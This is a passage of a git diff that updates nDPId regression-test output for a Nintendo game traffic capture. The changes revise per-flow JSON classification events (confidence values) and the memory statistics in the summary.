{"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1500731340951,"flow_last_seen":1500731340966,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731341194,"flow_last_seen":1500731341194,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":51035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1500731340951,"flow_last_seen":1500731340966,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":10184,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1500731329336,"flow_last_seen":1500731329520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.146.242.74","src_port":11534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1500731322454,"flow_last_seen":1500731343995,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":917,"flow_tot_l4_payload_len":4923,"flow_avg_l4_payload_len":91,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":160,"flow_first_seen":1500731343266,"flow_last_seen":1500731348756,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":45024,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1500731322454,"flow_last_seen":1500731343995,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":917,"flow_tot_l4_payload_len":4923,"flow_avg_l4_payload_len":91,"midstream":1,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"54.187.10.185","dst_ip":"192.168.12.114","src_port":443,"dst_port":48328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":160,"flow_first_seen":1500731343266,"flow_last_seen":1500731348756,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":45024,"flow_avg_l4_payload_len":281,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"81.61.158.138","src_port":55915,"dst_port":51769,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1500731326599,"flow_last_seen":1500731326628,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"192.168.12.1","src_port":18874,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Nintendo","breed":"Fun","category":"Game"}} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1500731340826,"flow_last_seen":1500731340827,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33334,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1500731340826,"flow_last_seen":1500731340827,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33334,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340941,"flow_last_seen":1500731340946,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33335,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1500731340941,"flow_last_seen":1500731340946,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":55915,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340981,"flow_last_seen":1500731340981,"flow_idle_time":200000,"flow_min_l4_payload_len":256,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":55915,"dst_port":34343,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731340981,"flow_last_seen":1500731340981,"flow_idle_time":200000,"flow_min_l4_payload_len":256,"flow_max_l4_payload_len":256,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":55915,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":157,"flow_first_seen":1500731343061,"flow_last_seen":1500731348745,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":1212,"flow_tot_l4_payload_len":46764,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1500731323269,"flow_last_seen":1500731323270,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":157,"flow_first_seen":1500731343061,"flow_last_seen":1500731348745,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":1212,"flow_tot_l4_payload_len":46764,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"93.237.131.235","src_port":55915,"dst_port":56066,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1500731323269,"flow_last_seen":1500731323270,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"35.158.74.61","src_port":52119,"dst_port":33335,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} 00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":200000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1500731326270,"flow_last_seen":1500731326270,"flow_idle_time":200000,"flow_min_l4_payload_len":688,"flow_max_l4_payload_len":688,"flow_tot_l4_payload_len":688,"flow_avg_l4_payload_len":688,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"52.10.205.177","src_port":52119,"dst_port":34343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731326644,"flow_last_seen":1500731327201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} -00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1500731341201,"flow_last_seen":1500731341710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6363,"flow_avg_l4_payload_len":318,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":447,"flow_first_seen":1500731342849,"flow_last_seen":1500731348749,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":168900,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1500731320644,"flow_last_seen":1500731325506,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":812,"flow_tot_l4_payload_len":4452,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1500731320774,"flow_last_seen":1500731322059,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1500731320764,"flow_last_seen":1500731321914,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} -00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1500731343274,"flow_last_seen":1500731343874,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731342860,"flow_last_seen":1500731343591,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":756,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731326644,"flow_last_seen":1500731327201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.217","src_port":41517,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} +00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1500731341201,"flow_last_seen":1500731341710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1348,"flow_tot_l4_payload_len":6363,"flow_avg_l4_payload_len":318,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"54.192.27.8","src_port":31329,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Nintendo","breed":"Fun","category":"Game"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":447,"flow_first_seen":1500731342849,"flow_last_seen":1500731348749,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":844,"flow_tot_l4_payload_len":168900,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"185.118.169.65","src_port":55915,"dst_port":27520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1500731320644,"flow_last_seen":1500731325506,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":812,"flow_tot_l4_payload_len":4452,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"91.8.243.35","src_port":52119,"dst_port":49432,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1500731320774,"flow_last_seen":1500731322059,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"109.21.255.11","src_port":52119,"dst_port":50251,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1500731320764,"flow_last_seen":1500731321914,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"192.168.12.114","dst_ip":"134.3.248.25","src_port":52119,"dst_port":56955,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Nintendo","breed":"Fun","category":"Game"}} +00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1500731343274,"flow_last_seen":1500731343874,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"151.6.184.98","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1500731342860,"flow_last_seen":1500731343591,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":756,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1500731348756,"l3_proto":"ip4","src_ip":"151.6.184.100","dst_ip":"192.168.12.114","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1000,"source":"nintendo.pcap","alias":"nDPId-test","packets-captured":1000,"packets-processed":996,"total-skipped-flows":0,"total-l4-payload-len":289225,"total-not-detected-flows":0,"total-guessed-flows":6,"total-detected-flows":15,"total-detection-updates":10,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":132,"global_ts_msec":1500731348756} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1000/996 @@ -138,9 +138,9 @@ ~~ total active/idle flows...: 21/21 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5931383 bytes -~~ total memory freed........: 5931383 bytes -~~ total allocations/frees...: 119205/119205 +~~ total memory allocated....: 6065017 bytes +~~ total memory freed........: 6065017 bytes +~~ total allocations/frees...: 121967/121967 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 1399 chars diff --git a/test/results/nntp.pcap.out b/test/results/nntp.pcap.out index 3f545f608..cc677b438 100644 --- a/test/results/nntp.pcap.out +++ b/test/results/nntp.pcap.out @@ -4,8 +4,8 @@ 